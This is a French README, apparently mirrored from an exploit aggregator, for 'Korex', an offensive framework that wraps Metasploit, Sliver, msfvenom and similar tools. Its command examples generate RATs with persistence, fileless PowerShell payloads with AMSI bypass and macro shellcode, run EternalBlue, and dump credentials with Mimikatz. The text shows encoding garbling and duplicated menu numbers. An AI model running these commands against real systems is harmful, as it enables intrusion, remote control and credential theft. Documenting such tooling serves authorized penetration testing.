Share
## https://sploitus.com/exploit?id=5D0965E7-F627-5299-9315-FAB35F6549B6
⥠KOREX FRAMEWORK âĄ
Advanced Security Operations Framework
"Korex ne remplace pas les outils Ă©tablis ; il en organise lâexploitation."
## đ TABLE DES MATIĂRES
- [đŻ PrĂ©sentation](#-prĂ©sentation)
- [⚠Fonctionnalités](#-fonctionnalités)
- [đŠ Architecture Modulaire](#-architecture-modulaire)
- [đ Types de RATs SupportĂ©s](#-types-de-rats-supportĂ©s)
- [đ Installation](#-installation)
- [đ Utilisation](#-utilisation)
- [đ» Mode Commande Unique](#-mode-commande-unique)
- [âïž Configuration](#ïž-configuration)
- [đ§Ș Tests & Laboratoires](#-tests--laboratoires)
- [đ Documentation](#-documentation)
- [đ€ Contribution](#-contribution)
- [â ïž Avertissement LĂ©gal](#ïž-avertissement-lĂ©gal)
- [đ Contact](#-contact)
## đŻ PRĂSENTATION
**Korex** est un framework offensif modulaire conçu pour **Kali Linux** et **Parrot Security OS**, spécialisé dans la génération de RATs (Remote Access Tools) et l'orchestration d'outils de cybersécurité existants.
Korex centralise et coordonne lâusage de plusieurs **outils offensifs reconnus**, en les intĂ©grant dans une interface unique conçue pour simplifier le pilotage des opĂ©rations.
**Le framework** peut ĂȘtre utilisĂ© de maniĂšre interactive ou via des commandes directes, selon les besoins opĂ©rationnels.
## âš FONCTIONNALITĂS
### đ **Reconnaissance**
| Outils | Fonctionnalités |
|--------|-----------------|
| Nmap, Rustscan, Masscan | Scan de ports TCP/UDP |
| Scripts NSE | Détection de services et d'OS |
| Vuln scanners | Scan de vulnérabilités automatique |
### đŁ **Payload Factory**
| Outils | Capacités |
|--------|-----------|
| msfvenom, Donut | Génération de payloads multi-plateforme |
| Veil, Shellter | Obfuscation avancée |
| UPX, XOR | Compression et encodage |
### đ **GĂ©nĂ©rateurs de RATs SpĂ©cialisĂ©s**
| Type | Description | Exemples |
|------|-------------|----------|
| **Traditionnels** | RATs User-mode avec interface graphique | DarkComet, njRAT, NanoCore, Quasar |
| **C2 Modernes** | Frameworks avec beaconing intelligent | Cobalt Strike, Metasploit, Sliver, Mythic |
| **Fileless** | RATs memory-resident sans fichier sur disque | PowerShell, WMI, Reflective DLL, .NET |
### đź **C2 Controller**
- Gestion unifiée des listeners (Metasploit, Empire, Covenant)
- DĂ©marrage/arrĂȘt de listeners
- Configuration automatique des payloads
### đ **Session Aggregator**
- Vue unique de toutes vos sessions (Metasploit + Empire + Covenant)
- Interaction centralisée
- Upload/download de fichiers
- Screenshot Ă distance
### âïž **Exploitation**
- Scan de vulnérabilités automatique
- Exploits intégrés (EternalBlue, BlueKeep)
- Brute-force (Hydra, Medusa)
### đ„ **Post-Exploitation**
- ĂnumĂ©ration avec winPEAS/linPEAS
- Dump de credentials (Mimikatz)
- BloodHound collector
- Persistance (registry, tĂąches, services, cron, SSH)
### đ **Report Engine**
- Rapports professionnels HTML, PDF, TXT, JSON
- Collecte automatique des données
- SynthÚse exécutive + détails techniques
- Recommandations de remédiation
## đ TYPES DE RATS SUPPORTĂS
### đïž **RATs Traditionnels (User-mode)**
| Caractéristiques | Templates |
|------------------|-----------|
| â
Interface graphique de contrĂŽle | **DarkComet** - RAT complet avec nombreuses features |
| â
Communication TCP simple | **njRAT** - Léger et stable |
| â
Peu d'obfuscation | **NanoCore** - Modulaire avec plugins |
| â
Binaire classique (.exe) | **QuasarRAT** - Open source et chiffré |
### đą **RATs C2 Modernes**
| Framework | Caractéristiques |
|-------------------|--------------------------------------|
| **Metasploit** | Payloads Meterpreter, AES + XOR |
| **Cobalt Strike** | Beacon, chiffrement AES256 + HMAC |
| **Sliver** | Implants multi-plateforme, WireGuard |
| **Mythic** | Agents cross-platform, AES256 + ECC |
### đłïž **RATs Fileless / Memory-Resident**
| Technique | Description |
|--------------------|--------------------------------------|
| **PowerShell** | Exécution en mémoire, AMSI bypass |
| **WMI** | Persistance via Event Subscription |
| **Reflective DLL** | Injection DLL sans écrire sur disque |
| **.NET Assembly** | Load depuis la mémoire |
| **Office Macro** | VBA avec shellcode |
## đ INSTALLATION
### Prérequis
- Kali Linux 2023+ ou Parrot OS 5.0+
- Python 3.8+
- 2 Go RAM minimum
- Connexion Internet
### Installation Automatique
# 1. Cloner le dépÎt
git clone https://github.com/Elfried002/KOREX.git
cd KOREX
# 2. Rendre le script exécutable
chmod +x install.sh
# 3. Lancer l'installation (root requis)
sudo ./install.sh
# 4. Vérifier l'installation
korex --check-deps
### Installation Manuelle
# 1. Copier les fichiers
sudo mkdir -p /usr/share/korex/{core,modules,utils,config,payloads,reports,loot,temp}
sudo cp -r * /usr/share/korex/
# 2. Installer les dépendances
sudo pip install -r requirements.txt
sudo apt install nmap metasploit-framework rustscan masscan hydra
# 3. Créer le lien symbolique
sudo ln -s /usr/share/korex/korex.py /usr/local/bin/korex
sudo chmod +x /usr/local/bin/korex
# 4. Compilateurs pour RATs C# (optionnel)
sudo apt install mono-complete
## đ UTILISATION
### Mode Interactif (par défaut)
sudo korex
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
MAIN MENU
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
[01] đ RECONNAISSANCE (Nmap, Rustscan, Masscan)
[02] đŁ PAYLOAD FACTORY (GĂ©nĂ©rique - msfvenom)
[03] đ RATS TRADITIONNELS (DarkComet, njRAT style)
[04] đŻ RATS C2 MODERNES (Cobalt Strike, Sliver)
[05] đłïž RATS FILELESS (Memory-resident)
[06] đź C2 CONTROLLER (Metasploit, Empire)
[07] đ SESSION AGGREGATOR (Voir toutes les sessions)
[08] âïž EXPLOITATION (Auto-pwn, Brute-force)
[09] đ„ POST-EXPLOITATION (Privesc, Persistence)
[10] đ REPORT ENGINE (HTML, PDF, TXT)
[08] â HELP (Documentation complĂšte)
[09] đȘ EXIT (Quitter Korex)
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
Korex >
Navigation par numéros ou mots-clés :
- `01` ou `recon` â Reconnaissance
- `02` ou `payload` â Payload Factory
- `03` ou `traditional` â RATs Traditionnels
- `04` ou `modern` â RATs C2 Modernes
- `05` ou `fileless` â RATs Fileless
- `06` ou `c2` â C2 Controller
- `07` ou `sessions` â Session Aggregator
- `08` ou `exploit` â Exploitation
- `09` ou `postex` â Post-Exploitation
- `10` ou `report` â Report Engine
- `08` ou `help` â Aide
- `09` ou `exit` â Quitter
## đ» MODE COMMANDE UNIQUE
### Reconnaissance
korex recon --target 192.168.1.0/24 --quick
korex recon --target 10.0.0.1 --ports 80,443
korex recon --target example.com --os-detection
### RATs Traditionnels
# DarkComet style
korex traditional --template darkcomet --lhost 10.0.0.1 --lport 5555
# njRAT style avec persistence
korex traditional --template njrat --lhost 10.0.0.1 --lport 5556 --persist registry
# QuasarRAT style
korex traditional --template quasar --lhost 10.0.0.1 --lport 5557
### RATs C2 Modernes
# Metasploit avec beaconing
korex modern --framework metasploit --lhost 10.0.0.1 --lport 443 --beacon --sleep 5 --jitter 20
# Sliver implant
korex modern --framework sliver --lhost 10.0.0.1 --lport 8443
# Payload Metasploit reverse_https
korex modern --framework metasploit --lhost 10.0.0.1 --lport 8080 --type reverse_https
### RATs Fileless
# PowerShell avec AMSI bypass
korex fileless --technique powershell --lhost 10.0.0.1 --lport 8080 --amsi-bypass
# WMI persistence
korex fileless --technique wmi --lhost 10.0.0.1 --lport 8081
# Office Macro
korex fileless --technique macro --lhost 10.0.0.1 --lport 8082
### C2 Controller
korex c2 --list
korex c2 --start metasploit --lport 4444
korex c2 --stop MSF-01
### Sessions
korex sessions --list
korex sessions --interact MSF-01
korex sessions --interact MSF-01 --command "whoami"
korex sessions --upload /tmp/script.ps1:C:\\Windows\\Temp\\
korex sessions --kill all
### Exploitation
korex exploit --target 192.168.1.105 --vuln eternalblue --lhost 10.0.0.1
korex exploit --target 192.168.1.110 --bruteforce ssh
### Post-Exploitation
korex postex --session MSF-01 --module winpeas
korex postex --session MSF-01 --module mimikatz
korex postex --session MSF-01 --persist registry
### Rapports
korex report --format html --output rapport.html --collect
korex report --format pdf --output rapport.pdf --include all
korex report --format txt --output rapport.txt --title "Pentest Report"
### Aide
korex help # Aide générale
korex help recon # Aide sur un module spécifique
korex help traditional # Aide sur RATs traditionnels
korex --check-deps # Vérifier les dépendances
korex --version # Version
## âïž CONFIGURATION
### Fichiers de configuration
- **Globale** : `/etc/korex/korex.conf`
- **Utilisateur** : `~/.korex/config.conf`
- **Chemins des outils** : `/usr/share/korex/config/tools_paths.json`
- **Base de données d'aide** : `/usr/share/korex/config/help_database.json`
### Exemple de configuration
[GENERAL]
LANGUAGE = fr
COLORS = true
LOG_LEVEL = INFO
[PATHS]
PAYLOAD_DIR = /usr/share/korex/payloads
TRADITIONAL_PAYLOAD_DIR = /usr/share/korex/payloads/traditional
MODERN_PAYLOAD_DIR = /usr/share/korex/payloads/modern_c2
FILELESS_PAYLOAD_DIR = /usr/share/korex/payloads/fileless
[TRADITIONAL_RAT]
COMPILER = mcs
DEFAULT_TEMPLATE = darkcomet
[MODERN_RAT]
DEFAULT_FRAMEWORK = metasploit
DEFAULT_BEACON_SLEEP = 5
DEFAULT_BEACON_JITTER = 20
[FILELESS_RAT]
DEFAULT_TECHNIQUE = powershell
DEFAULT_AMSI_BYPASS = true
## đ§Ș TESTS & LABORATOIRES
### Environnements supportés
| OS | Statut |
|------------------|-----------------|
| Kali Linux 2023+ | â
Full support |
| Parrot OS 5.0+ | â
Full support |
| Ubuntu/Debian | â ïž Partiel |
| Windows (WSL) | â ïž Partiel |
| macOS | â Non supportĂ© |
### Plateformes recommandées
- â
HackTheBox
- â
TryHackMe
- â
Proving Grounds
- â
VulnHub
- â
Laboratoires personnels
- â
Missions de pentest avec contrat
## đ DOCUMENTATION
### Commandes utiles
# Aide intégrée
korex help
korex help traditional
korex help modern
korex help fileless
# Vérification
korex --check-deps
korex --version
## đ€ CONTRIBUTION
Les contributions sont les bienvenues ! Voici comment contribuer :
1. **Fork** le projet
2. Créer une branche (`git checkout -b feature/amazing-feature`)
3. **Commit** vos changements (`git commit -m 'Add amazing feature'`)
4. **Push** (`git push origin feature/amazing-feature`)
5. Ouvrir une **Pull Request**
### RĂšgles de contribution
- Code commenté en français ou anglais
- Respecter la structure existante
- Tester sur Kali Linux
- Documenter les nouvelles fonctionnalités
## â ïž AVERTISSEMENT LĂGAL
**Korex est un outil de cybersécurité destiné à des fins éducatives et professionnelles dans un cadre légal.**
L'utilisation de ce logiciel pour accĂ©der Ă des systĂšmes sans autorisation explicite est **ILLĂGALE** et peut entraĂźner des poursuites pĂ©nales.
### Usage autorisé
â
Vos propres systĂšmes
â
Environnements de test avec autorisation
â
Missions de pentest avec contrat écrit
â
Laboratoires d'apprentissage (CTF, HackTheBox, etc.)
### Usage interdit
â AccĂšs non autorisĂ© Ă des systĂšmes
â Vol de donnĂ©es
â Perturbation de services
â ActivitĂ©s malveillantes
**Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.**
## đ CONTACT
- **Auteur** : ELFried YOBOUET
- **GitHub** : [@Elfried002](https://github.com/Elfried002)
- **Email** : elfriedyobouet@gmail.com
## đ REMERCIEMENTS
- L'équipe Metasploit
- Les développeurs de Empire
- La communauté Kali Linux
- Tous les contributeurs des outils utilisés
- Les testeurs et beta-users
Korex â "The Core of Advanced Security Operations" đ„
© 2026 ELFried YOBOUET - Tous droits réservés
Haut de page âą
GitHub âą